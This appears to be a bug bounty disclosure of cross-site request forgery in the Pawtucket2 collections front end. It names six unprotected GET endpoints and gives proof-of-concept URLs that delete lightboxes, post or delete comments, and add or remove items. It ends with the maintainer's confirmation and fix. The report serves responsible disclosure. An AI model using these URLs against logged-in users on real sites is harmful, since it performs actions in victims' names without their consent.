Cross-Site Request Forgery (CSRF) in collectiveaccess/pawtucket2

Status: Valid

Reported on Oct 1st 2021


Description

The following endpoints perform state-changing actions in response to a plain GET request and require no CSRF token. Although the Pawtucket front end calls them via AJAX, the server does not check how the request was made: any GET that carries the victim's session cookie is accepted, so an attacker can trigger them from a link, an image tag or a redirect on a page the victim visits:

1: Delete lightbox
2: Delete comments
3: Create comments
4: Create comments on objects
5: Add items into lightbox
6: Delete items from lightbox

Proof of Concept

While logged in to Pawtucket, open any of the following URLs in the browser's address bar (replace [PAWTUCKET-URL] with the site's host and the ids with ones that exist); the action is performed with no confirmation and no token check. An attacker only needs a logged-in user to load the same URL from a page or link they control.

1: http://[PAWTUCKET-URL]/pawtucket/index.php/Lightbox/DeleteLightbox?set_id=1
2: http://[PAWTUCKET-URL]/pawtucket/index.php/Lightbox/AjaxDeleteComment?comment_id=10
3: http://[PAWTUCKET-URL]/pawtucket/index.php/Lightbox/AjaxAddComment?comment=LOL&type=ca_sets&id=1
4: http://[PAWTUCKET-URL]/pawtucket/index.php/Detail/saveCommentTagging?tags=LOL&comment=LOL&item_id=1&tablename=ca_objects
5: http://[PAWTUCKET-URL]/pawtucket/index.php/Lightbox/AjaxAddItem?set_id=1&name=&description=&object_id=1&object_ids=&saveLastResults= 
6: http://[PAWTUCKET-URL]/pawtucket/index.php/Lightbox/AjaxDeleteItem?set_id=1&item_id=1

Impact

Delete or disrupt user-created lightboxes, remove items from them, and delete or post comments on the victim's behalf. Each action runs under the victim's session, so the attacker needs no credentials, only a logged-in user who loads a crafted page or link.

We have contacted a member of the collectiveaccess/pawtucket2 team and are waiting to hear back (2 months ago)
CollectiveAccess validated this vulnerability (2 months ago)
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs

CollectiveAccess (Maintainer), 2 months ago:

Fix in place for this.

CollectiveAccess confirmed that a fix has been merged on 335159 (2 months ago)
CollectiveAccess has been awarded the fix bounty